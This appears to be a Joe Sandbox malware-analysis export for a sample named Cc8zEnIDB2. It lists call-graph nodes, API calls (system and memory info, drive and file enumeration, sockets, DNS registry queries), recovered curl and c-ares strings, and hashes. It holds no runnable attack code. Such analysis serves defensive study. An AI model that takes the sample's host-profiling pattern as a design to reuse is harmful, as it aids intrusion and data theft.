91821->91795 91823 4e6fd4 91822->91823 91825 4e6feb 91822->91825 91824 4e7207 select 91823->91824 91823->91825 91824->91825 91825->91811 91827 50df44 91826->91827 91829 50dfb9 91827->91829 91831 50dfb5 91827->91831 91832 4e7450 localeconv localeconv 91827->91832 91833 4e7380 localeconv localeconv 91829->91833 91831->91817 91832->91827 91833->91831 92141 4e1139 92166 50baa0 92141->92166 92143 4e1148 92144 4e1512 92143->92144 92145 4e1161 92143->92145 92148 4e1527 92144->92148 92172 4dfec0 8 API calls 92144->92172 92146 4e0f69 92145->92146 92171 4e0150 localeconv localeconv 92145->92171 92149 4e1f58 92146->92149 92150 4e1fb0 92146->92150 92155 4e0f00 92146->92155 92148->92146 92173 4e22d0 8 API calls 92148->92173 92174 4e0150 localeconv localeconv 92149->92174 92150->92155 92176 4e4940 localeconv localeconv 92150->92176 92161 4e0f21 92155->92161 92170 4e0150 localeconv localeconv 92155->92170 92156 4e1fa6 92156->92155 92158 4e208a 92156->92158 92159 4d75a0 2 API calls 92156->92159 92156->92161 92177 4e3900 localeconv localeconv 92158->92177 92163 4e2057 92159->92163 92162 4e1f61 92162->92156 92175 50d4d0 7 API 
calls 92162->92175 92165 4d75a0 2 API calls 92163->92165 92165->92158 92167 50bb60 92166->92167 92169 50bac7 92166->92169 92167->92143 92169->92167 92178 4f05b0 localeconv localeconv 92169->92178 92170->92161 92171->92146 92172->92148 92173->92146 92174->92162 92175->92156 92176->92156 92177->92155 92178->92167 91834 583c00 91835 583c23 91834->91835 91837 583c0d 91834->91837 91835->91837 91838 59b180 91835->91838 91842 59b19b 91838->91842 91845 59b2e3 91838->91845 91841 59b2a9 getsockname 91855 59b020 91841->91855 91842->91841 91844 59b020 closesocket 91842->91844 91842->91845 91846 59af30 91842->91846 91850 59b060 91842->91850 91844->91842 91845->91837 91847 59af4c 91846->91847 91848 59af63 socket 91846->91848 91847->91848 91849 59af52 91847->91849 91848->91842 91849->91842 91853 59b080 91850->91853 91851 59b0b0 connect 91852 59b0bf WSAGetLastError 91851->91852 91852->91853 91854 59b0ea 91852->91854 91853->91851 91853->91852 91853->91854 91854->91842 91856 59b052 91855->91856 91858 59b029 91855->91858 91856->91842 91857 59b04b closesocket 91857->91856 91858->91857 91859 59b03e 91858->91859 91859->91842 92179 584720 92181 584728 92179->92181 92180 584733 92181->92180 92190 58476c 92181->92190 92191 585540 7 API calls 92181->92191 92183 584774 92185 58482e 92185->92190 92192 589270 92185->92192 92187 584860 92197 584950 92187->92197 92189 584878 92190->92189 92203 5830a0 7 API calls 92190->92203 92191->92185 92204 58a440 92192->92204 92194 589297 92196 5892ab 92194->92196 92238 58bbe0 7 API calls 92194->92238 92196->92187 92200 584966 92197->92200 92198 584aa0 gethostname 92199 5849c5 92198->92199 92202 5849b9 92198->92202 92199->92190 92200->92199 92200->92202 92239 58bbe0 7 API calls 92200->92239 92202->92198 92202->92199 92203->92183 92234 58a46b 92204->92234 92205 58aa03 RegOpenKeyExA 92206 58ab70 RegOpenKeyExA 92205->92206 92207 58aa27 RegQueryValueExA 92205->92207 92210 58ac34 RegOpenKeyExA 92206->92210 92227 58ab90 92206->92227 92208 58aacc RegQueryValueExA 
92207->92208 92209 58aa71 92207->92209 92212 58ab0e 92208->92212 92213 58ab66 RegCloseKey 92208->92213 92209->92208 92216 58aa85 RegQueryValueExA 92209->92216 92211 58acf8 RegOpenKeyExA 92210->92211 92230 58ac54 92210->92230 92214 58ad56 RegEnumKeyExA 92211->92214 92217 58ad14 92211->92217 92212->92213 92220 58ab1e RegQueryValueExA 92212->92220 92213->92206 92215 58ad9b 92214->92215 92214->92217 92218 58ae16 RegOpenKeyExA 92215->92218 92219 58aab3 92216->92219 92217->92194 92221 58addf RegEnumKeyExA 92218->92221 92222 58ae34 RegQueryValueExA 92218->92222 92219->92208 92223 58ab4c 92220->92223 92221->92217 92221->92218 92224 58af43 RegQueryValueExA 92222->92224 92237 58adaa 92222->92237 92223->92213 92225 58b052 RegQueryValueExA 92224->92225 92224->92237 92226 58adc7 RegCloseKey 92225->92226 92225->92237 92226->92221 92227->92210 92228 58a794 GetBestRoute2 92231 58d190 2 API calls 92228->92231 92229 58afa0 RegQueryValueExA 92229->92237 92230->92211 92231->92234 92232 58a6c7 GetBestRoute2 92233 58d190 2 API calls 92232->92233 92233->92234 92234->92228 92234->92232 92235 58b180 localeconv localeconv 92234->92235 92236 58a4db 92234->92236 92235->92234 92236->92205 92236->92217 92237->92224 92237->92225 92237->92226 92237->92229 92238->92196 92239->92202 91860 59a080 91863 599740 91860->91863 91862 59a09b 91864 599780 91863->91864 91869 59975d 91863->91869 91865 599925 RegOpenKeyExA 91864->91865 91864->91869 91866 59995a RegQueryValueExA 91865->91866 91870 599812 91865->91870 91867 599986 RegCloseKey 91866->91867 91867->91869 91869->91870 91871 58d190 91869->91871 91870->91862 91872 58d1ae 91871->91872 91875 58d1fa 91871->91875 91874 58d1e8 91872->91874 91911 58d8f0 localeconv localeconv 91872->91911 91874->91869 91876 58d4f9 91875->91876 91877 58d4b7 91875->91877 91879 58d504 91876->91879 91920 58d8f0 localeconv localeconv 91876->91920 91912 58d8f0 localeconv localeconv 91877->91912 91886 58d516 91879->91886 91921 58d8f0 localeconv localeconv 91879->91921 91880 58d4ce 
91885 58d4e3 91880->91885 91913 58d8f0 localeconv localeconv 91880->91913 91883 58d52c 91894 58d535 91883->91894 91924 58d8f0 localeconv localeconv 91883->91924 91890 58d4f4 91885->91890 91914 58d8f0 localeconv localeconv 91885->91914 91892 58d51f 91886->91892 91922 58d8f0 localeconv localeconv 91886->91922 91896 58d5bf 91890->91896 91915 58d8f0 localeconv localeconv 91890->91915 91892->91883 91923 58d8f0 localeconv localeconv 91892->91923 91893 58d547 91893->91874 91927 58d8f0 localeconv localeconv 91893->91927 91901 58d53e 91894->91901 91925 58d8f0 localeconv localeconv 91894->91925 91900 58d5fb 91896->91900 91916 58d8f0 localeconv localeconv 91896->91916 91899 58d87f 91899->91874 91928 58d8f0 localeconv localeconv 91899->91928 91905 58d632 91900->91905 91917 58d8f0 localeconv localeconv 91900->91917 91901->91893 91901->91899 91903 58d7fe 91901->91903 91926 58d8f0 localeconv localeconv 91903->91926 91908 58d66e 91905->91908 91918 58d8f0 localeconv localeconv 91905->91918 91908->91874 91919 58d8f0 localeconv localeconv 91908->91919 91911->91874 91912->91880 91913->91885 91914->91890 91915->91896 91916->91900 91917->91905 91918->91908 91919->91874 91920->91879 91921->91886 91922->91892 91923->91883 91924->91894 91925->91901 91926->91893 91927->91874 91928->91874 91929 4d2f17 91937 4d2f2c 91929->91937 91930 4d31d3 91933 4d315c RegEnumKeyExA 91934 4d31b2 RegCloseKey 91933->91934 91933->91937 91934->91937 91935 4d1619 2 API calls 91936 4d3046 RegOpenKeyExA 91935->91936 91936->91937 91938 4d3089 RegQueryValueExA 91936->91938 91937->91930 91937->91933 91937->91935 91939 4d313b RegCloseKey 91937->91939 91940 4d1619 91937->91940 91938->91937 91938->91939 91939->91937 91943 861340 91940->91943 91942 4d1645 RegOpenKeyExA 91942->91937 91944 861390 91943->91944 91945 861359 91943->91945 91947 85d1b0 2 API calls 91944->91947 91950 85d1b0 91945->91950 91949 8613b0 91947->91949 91948 861378 91948->91942 91949->91942 91955 85d1cd 91950->91955 91951 85d4e4 localeconv 91951->91955 
91952 85c9a0 localeconv 91952->91955 91953 85ca30 localeconv 91953->91955 91954 85d38e 91954->91948 91955->91951 91955->91952 91955->91953 91955->91954 91956 85cc70 localeconv 91955->91956 91956->91955 91957 4d31d7 91958 4d31f4 91957->91958 91959 4d3200 91958->91959 91963 4d3223 91958->91963 91964 4d15b0 localeconv localeconv 91959->91964 91961 4d321e 91962 4d32dc CloseHandle 91962->91961 91963->91962 91964->91961
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                      • API String ID: 0-1590685507
                                                      • Opcode ID: bf5136502e0fc16edb7d8bca38edc79b5a356acd81d46c3bbbe593a988b3ddfa
                                                      • Instruction ID: d59deebe9fbe2bf722c5e513c36f841f16b1f5f777fa2590ce6230a4d23c9402
                                                      • Opcode Fuzzy Hash: bf5136502e0fc16edb7d8bca38edc79b5a356acd81d46c3bbbe593a988b3ddfa
                                                      • Instruction Fuzzy Hash: 48C2D531A043459FE724CF29C445B6ABBE1BF88314F05CA6DEC989B692D771ED84CB81

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 857 4d255d-4d2614 call 859f70 GetSystemInfo call 90f770 call 90f960 GlobalMemoryStatusEx call 90f770 call 90f960 939 4d2619 call 7150315 857->939 940 4d2619 call 7150395 857->940 941 4d2619 call 7150431 857->941 942 4d2619 call 71502f0 857->942 943 4d2619 call 71502f2 857->943 944 4d2619 call 715033e 857->944 945 4d2619 call 71503f9 857->945 946 4d2619 call 715041a 857->946 947 4d2619 call 71503ba 857->947 948 4d2619 call 7150304 857->948 949 4d2619 call 7150384 857->949 950 4d2619 call 71503e0 857->950 951 4d2619 call 7150443 857->951 952 4d2619 call 7150428 857->952 953 4d2619 call 71504ab 857->953 954 4d2619 call 715036b 857->954 868 4d261b-4d2620 869 4d277c-4d2904 call 90f770 call 90f960 KiUserCallbackDispatcher call 90f770 call 90f960 call 90f770 call 90f960 call 858e38 call 858be0 call 858bd0 FindFirstFileW 868->869 870 4d2626-4d2637 call 90f570 868->870 917 4d2928-4d292c 869->917 918 4d2906-4d2926 FindNextFileW 869->918 875 4d2754-4d275c 870->875 877 4d263c-4d264f GetDriveTypeA 875->877 878 4d2762-4d2777 call 90f960 875->878 880 4d2655-4d2685 GetDiskFreeSpaceExA 877->880 881 4d2743-4d2751 call 858b98 877->881 878->869 880->881 884 4d268b-4d273e call 90f840 call 90f8d0 call 90f960 call 90f660 call 90f960 call 90f660 call 90f960 call 90dce0 880->884 881->875 884->881 919 4d292e 917->919 920 4d2932-4d296f call 90f770 call 90f960 call 858e78 917->920 918->917 918->918 919->920 926 4d2974-4d2979 920->926 927 4d29a9-4d29fe call 85a290 call 90f770 call 90f960 926->927 928 4d297b-4d29a4 call 90f770 call 90f960 926->928 928->927 939->868 940->868 941->868 942->868 943->868 944->868 945->868 946->868 947->868 948->868 949->868 950->868 951->868 952->868 953->868 954->868
                                                      APIs
                                                      • GetSystemInfo.KERNELBASE ref: 004D2579
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 004D25CC
                                                      • GetDriveTypeA.KERNELBASE ref: 004D2647
                                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 004D267E
                                                      • KiUserCallbackDispatcher.NTDLL ref: 004D27E2
                                                      • FindFirstFileW.KERNELBASE ref: 004D28F8
                                                      • FindNextFileW.KERNELBASE ref: 004D291F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                      • String ID: ;%M$@$`
                                                      • API String ID: 3271271169-1184465558
                                                      • Opcode ID: fec01c5a809ce5dc1f01c16cf81e0f67aa33cfb2a827b62c173885abb6e16134
                                                      • Instruction ID: 47384b3c3b7f231909beac71f5057772a26b1318b0859bd93955e2d812523588
                                                      • Opcode Fuzzy Hash: fec01c5a809ce5dc1f01c16cf81e0f67aa33cfb2a827b62c173885abb6e16134
                                                      • Instruction Fuzzy Hash: 97D1B2B49057099FCB10EF68C59569EBBF0FF88344F00896AE898D7351E7749A84CF52

                                                      Control-flow Graph for the function at 0x4d29ff (rendered graph with its Executed / Not Executed legend not reproduced)
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                      • String ID: 0
                                                      • API String ID: 2406880114-4108050209
                                                      • Opcode ID: 51dbddfa187b1a81fc91175308270fd3707a87e28ca3182396003de3f1f5a1e0
                                                      • Instruction ID: 1dc81fe51cf26f5ed9dbaee58510b7303ec093f04aede8e7cbee1cfeb11cc8f9
                                                      • Opcode Fuzzy Hash: 51dbddfa187b1a81fc91175308270fd3707a87e28ca3182396003de3f1f5a1e0
                                                      • Instruction Fuzzy Hash: A2E1C7B09053099FCB50EF68D99569EBBF4EF44344F40886AE898DB350E778DA49CF42

                                                      Control-flow Graph for the function at 0x4e05b0 (rendered graph with its Executed / Not Executed legend not reproduced)
                                                      APIs
                                                      • WSAEventSelect.WS2_32(?,?,?), ref: 004E0712
                                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 004E09DD
                                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004E09FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: EventSelect$EnumEventsNetwork
                                                      • String ID: N=M$multi.c
                                                      • API String ID: 2170980988-2986268608
                                                      • Opcode ID: c95bad41eaf0c6ccf7152cc3646631493799e260fca5755b5f0b884282672fb1
                                                      • Instruction ID: 3ce22536f8c1d4049070984a43b883ffbe06bc52b5dc20f9e081794704f53cd9
                                                      • Opcode Fuzzy Hash: c95bad41eaf0c6ccf7152cc3646631493799e260fca5755b5f0b884282672fb1
                                                      • Instruction Fuzzy Hash: 84D1E3716083819FE710DF62C881B6BB7E5FF94349F04482EF89486242E7B8E985CB56

                                                      Control-flow Graph for the function at 0x59b180 (rendered graph with its Executed / Not Executed legend not reproduced)
                                                      APIs
                                                      • getsockname.WS2_32(-00000020,-00000020,?), ref: 0059B2B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: ares__sortaddrinfo.c$cur != NULL
                                                      • API String ID: 3358416759-2430778319
                                                      • Opcode ID: 0bc208c026b7554e62d3dc3dc383138b43b907b693f245c55155867f100bc717
                                                      • Instruction ID: 8369d4815bcb398441306d064c173b5981ebabf56000e720da74dcdf2564376d
                                                      • Opcode Fuzzy Hash: 0bc208c026b7554e62d3dc3dc383138b43b907b693f245c55155867f100bc717
                                                      • Instruction Fuzzy Hash: 27C17F316043059FFF18DF24DA84A6A7BE1FF88714F058928E8498B3A2E735ED45CB81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76134ff3c4557313df55141874c94654568fbaa49980dcb614a7754d5f0acea2
                                                      • Instruction ID: bdef5698bf01c2444a13b6c4597bb68cf61180ab2a1373e800c18539006064a3
                                                      • Opcode Fuzzy Hash: 76134ff3c4557313df55141874c94654568fbaa49980dcb614a7754d5f0acea2
                                                      • Instruction Fuzzy Hash: CAB1C2EB66C123BDBA0A81452B54AFA677EE6CF730F328436F407C6582E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 723ebcd3cc83060528b0efbdf205472189f5b638f261a8a81e4f5124e1cb38fe
                                                      • Instruction ID: e5fb0640803fec1ec4addd7ab464b0496cfd1c72f4e88690f224c5bc0530fd6c
                                                      • Opcode Fuzzy Hash: 723ebcd3cc83060528b0efbdf205472189f5b638f261a8a81e4f5124e1cb38fe
                                                      • Instruction Fuzzy Hash: 4B91263060C3898BD7358A2AC8847BBB2D5FFC4371F148B2EE998432D4E7789D41D696
                                                      APIs
                                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0058712E,?,?,?,00001001,00000000), ref: 0059A90D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: recvfrom
                                                      • String ID:
                                                      • API String ID: 846543921-0
                                                      • Opcode ID: dbd246c05fd3d64f0acbfd5ad75c996e080b5304bbfc25c509161c9b1a506fcd
                                                      • Instruction ID: 732e81a2d72edf84fddaccff33961a6842587030aaeae7535290c0dd8b133758
                                                      • Opcode Fuzzy Hash: dbd246c05fd3d64f0acbfd5ad75c996e080b5304bbfc25c509161c9b1a506fcd
                                                      • Instruction Fuzzy Hash: EDF06D75108308AFD6109E01DC48D6BBBEDFFC9758F05496DF948232118370AE10CAB2
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0058AA19
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0058AA4C
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0058AA97
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0058AAE9
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0058AB30
                                                      • RegCloseKey.KERNELBASE(?), ref: 0058AB6A
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0058AB82
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0058AC46
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0058AD0A
                                                      • RegEnumKeyExA.KERNELBASE ref: 0058AD8D
                                                      • RegCloseKey.KERNELBASE(?), ref: 0058ADD9
                                                      • RegEnumKeyExA.KERNELBASE ref: 0058AE08
                                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0058AE2A
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0058AE54
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0058AF63
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0058AFB2
                                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0058B072
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$Open$CloseEnum
                                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                      • API String ID: 4217438148-1047472027
                                                      • Opcode ID: 42826f73ea8c038b3de82fee019bebdbed0ffa2d361b516c6b5b26517174e2d0
                                                      • Instruction ID: f7717f6b16ea24ff046a0aea09464dafcb7db945ebec764f8316e36708037fcd
                                                      • Opcode Fuzzy Hash: 42826f73ea8c038b3de82fee019bebdbed0ffa2d361b516c6b5b26517174e2d0
                                                      • Instruction Fuzzy Hash: D1728DB1605301AFF720EB24CC85B6B7BE8BF85700F144829F985AB2A1E775E945CB53
                                                      APIs
                                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0050A832
                                                      Strings
                                                      • Could not set TCP_NODELAY: %s, xrefs: 0050A871
                                                      • Local Interface %s is ip %s using address family %i, xrefs: 0050AE60
                                                      • cf-socket.c, xrefs: 0050A5CD, 0050A735
                                                      • @, xrefs: 0050AC42
                                                      • @, xrefs: 0050A8F4
                                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0050AD0A
                                                      • Trying [%s]:%d..., xrefs: 0050A689
                                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 0050AE1F
                                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 0050ADAC
                                                      • cf_socket_open() -> %d, fd=%d, xrefs: 0050A796
                                                      • Trying %s:%d..., xrefs: 0050A7C2, 0050A7DE
                                                      • Bind to local port %d failed, trying next, xrefs: 0050AFE5
                                                      • Local port: %hu, xrefs: 0050AF28
                                                      • bind failed with errno %d: %s, xrefs: 0050B080
                                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0050A6CE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: setsockopt
                                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3981526788-2373386790
                                                      • Opcode ID: 9e432993e0d3794163eaea7b9e95057c6d8869c646771ba4542db0a795bf0026
                                                      • Instruction ID: 6b5e8e65240fec632ef3bb9c43adb30082adc4873b04e38c718c12c5284b62e4
                                                      • Opcode Fuzzy Hash: 9e432993e0d3794163eaea7b9e95057c6d8869c646771ba4542db0a795bf0026
                                                      • Instruction Fuzzy Hash: 8462D271504381ABE721CF24C846BAFBBE4FF95314F044929F98897292E771E945CB93

                                                      Control-flow Graph (graph rendering not reproduced; function entry 00599740; legend: Executed / Not Executed)
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00599946
                                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00599974
                                                      • RegCloseKey.KERNELBASE(?), ref: 0059998B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                      • API String ID: 3677997916-615551945
                                                      • Opcode ID: 7db84bfaf6f7456a7260432a16765b382a06b64af81ad50409a2c74ce0e69b5c
                                                      • Instruction ID: a185838ecea160ac0a5f8a0516254eff9177e96371a939e60c096fb786ea42b9
                                                      • Opcode Fuzzy Hash: 7db84bfaf6f7456a7260432a16765b382a06b64af81ad50409a2c74ce0e69b5c
                                                      • Instruction Fuzzy Hash: 623288B5904202ABEF11AB24EC46A1B7FA9BF95354F084838FD0996263F731ED15C793

                                                      Control-flow Graph (graph rendering not reproduced; function entry 00508B50; legend: Executed / Not Executed)
                                                      APIs
                                                      • connect.WS2_32(?,?,00000001), ref: 00508C2F
                                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 00508CF3
                                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00508D0F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: Sleepconnectgetsockopt
                                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                      • API String ID: 1669343778-879669977
                                                      • Opcode ID: 7732952b28f8e0c600fdc7128a2c7702d20d91c87a3ff2a35ca899d7babf8f00
                                                      • Instruction ID: 01046e3aadc1e73b20596f500b997f409cbd74f7b1011a78eca938ff9b2c3f58
